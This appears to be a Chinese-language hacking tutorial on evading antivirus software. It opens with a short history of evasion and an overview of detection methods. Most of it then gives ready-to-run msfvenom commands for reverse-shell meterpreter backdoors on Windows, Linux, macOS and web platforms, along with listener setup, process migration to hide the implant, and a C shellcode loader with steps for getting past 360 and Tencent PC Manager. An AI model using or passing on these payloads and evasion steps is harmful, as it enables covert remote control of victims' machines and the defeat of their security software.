本文内容:
- 免杀技术发展史
- 杀软原理简介
- 后门生成常用命令
- 常见生成后门模式
从后门生成模块到权限维持:
免杀技术发展史:
理论上讲,免杀一定是出现在杀毒软件之后的。
通过杀毒软件的发展史不难使用,第一款杀毒软件kill 1.0 是Winsh公司1987年推出的。
也就是说免杀技术至少在1989年以后才发展起来。[国外无从拷问,国内非常晚]
1989年:第一款杀毒软件Mcafee诞生,标志着反病毒反差杀时代的到来
1997年:国内出现了第一个可以自动变异的千面人病毒,自动变异就是病毒针对杀毒软件的免杀方法之一,但是与免杀手法的定义有出入。
2002.7.31:国内第一个真正意义上的变种病毒"中国黑客II"出现,它处理具有新的特征之外,还实现了"中国黑客"第一代所谓实现的功能,可见这个变种也是病毒编写者自己制造的。
2005.09:免杀技术开始真正的火起来。
由上面的信息可见,国内在1997年出现了第一个可以自动变异的千面人病毒,虽然自动变异也可以看为是针对杀毒软件的一种免杀方法,但是由于与免杀手法的定义有出入,所以如果将国内免杀技术起源定位1997年会显得比较牵强。
2002.7.31:国内第一个真正意义上的变种病毒"中国黑客II"才迟迟出现,因此我们暂且可以将国内免杀技术的起源定位在2002年7月。
杀软原理简介:
免杀感念:免除被杀:
杀毒软件检测方式:
1.扫描压缩包技术:即是对压缩包和封装文件作为分析检查的技术。
2.程序窜改防护:即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。
3.修复技术:即是对 恶意程序所损坏的文件进行还原。
4.急救盘杀毒:扫描最常用的磁盘,系统关键位置,耗时较短。
5.智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。
6.全盘扫描:扫描电脑全部磁盘,耗时较长。
7.勒索软件防护:保护电脑中的文件不被黑盒恶意加密。
8.开机扫描:当电脑开机时自动进行扫描,可以扫描压缩文档和可能不需要的程序。
监控技术:
1.内存监控:当发现内存中存在病毒的时候,就主动报警;监控所有进程;监控读取到内存中的文件;监控读取到内存的网络数据。
2.文件监控:当发现写到磁盘上的文件中存在病毒,或者是被病毒感染,就会主动报警。
3.邮件监控:当发现电子邮件的附件存在病毒时进行拦截。
4.网页防护:组织网络攻击和提醒用户可疑的应用程序行为。
5.行为防护:
扫描引擎:
1.特征码扫描
2.文件校验和法
3.进程行为检测法[沙盒模式]
4.主动防御技术
5.机器学习识别技术
免杀技术介绍:
1.修改特征码
2.花指令免杀
3.加壳免杀
4.内存免杀
5.二次编译
6.分离免杀
7.资源修改
1,后门生成常用命令:
从后门生成模块到权限维持:
-p 指定payload模块
-l 列出可用项
-f 指定文件类型
-e 加载编码器
-b 删除无效字符
-i 指定编码次数
-x 捆绑文件
-o 导出文件
-v 指定变量名
使用MSFvenom快速生成木马并且进行连接:
生成一个常见木马文件:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.221.143 lport=1250 -f exe > shell.exe
连接木马文件:
1.监听模块: use exploit/multi/handler
2.设置payload:set payload windows/meterpreter/reverse_tcp
3.查看设置选项:options需要设置选项:[lhost、lport]
4.设置本机地址:set lhost 127.0.0.1
5.设置端口:set lport 1433
6.开始连接:run
7.查看用户权限:getuid
迁移进程:
迁移进程命令:migrate
ps:查看所有进程
使用迁移进程命令:migrate 1433[进程PID]:将我们的进程迁移到我们想要迁移的进程里了,就发现不了我们的进程了。
杀死进程:
杀死进程命令:kill:杀死命令
kali 5744[进程PID]
补充:查看进程命令:?
2,常见的生成后门模式:
1.Windows:
msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:ack.exe
msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:ack.exe
2.Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
3.MAC:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
4.PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT=1520 -f raw > shell.php
5.ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
6.ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
3,绕过360生成测试:
1.安装编译软件VC++6.0
2.生成木马后门:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘x00’ lhost=192.168.177.128 lport=1250 -f c
3.编译C语言为exe文件:
#include "stdafx.h"
#include <stdio.h>
#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"")
unsigned char buf[] =
(这里放生成好的数组)
main()
{
((void(*)(void))&buf)();
}
4.测试是否成功:
5.VC++6.0使用教程:
1.新建Win32 Console Application工程:
打开VC6.0,在菜单栏中选择“文件 -> 新建”,或者 Ctrl+N。
切换到“工程”选项卡,选择“Win32 Console Application”,填写工程名称和路径,点击“确定”
2.会弹出一个对话框询问类型,这里选择“一个简单的程序”
3.点击树状列表-下方FiveView视图,选择-Source Files--xxx.cpp--打开
4.将编译c语言为exe文件代码复制替换进去。
5.将MSF生成的后门数组,放进去代码提示的地方。
6.编译之后,组建即可。
在线查杀:http://www.virscan.org
推荐一篇文章:http://c.biancheng.net/view/464.html
4,绕过腾讯管家生成测试:
与360生成测试部分一致,差异在于:
需要添加图标进行绕过测试,将特征码改变
在VC++6.0新建文件,编译,组建,改变.exe文件的内存大小,即成功,改变特征码。
可以实现腾讯管家的绕过。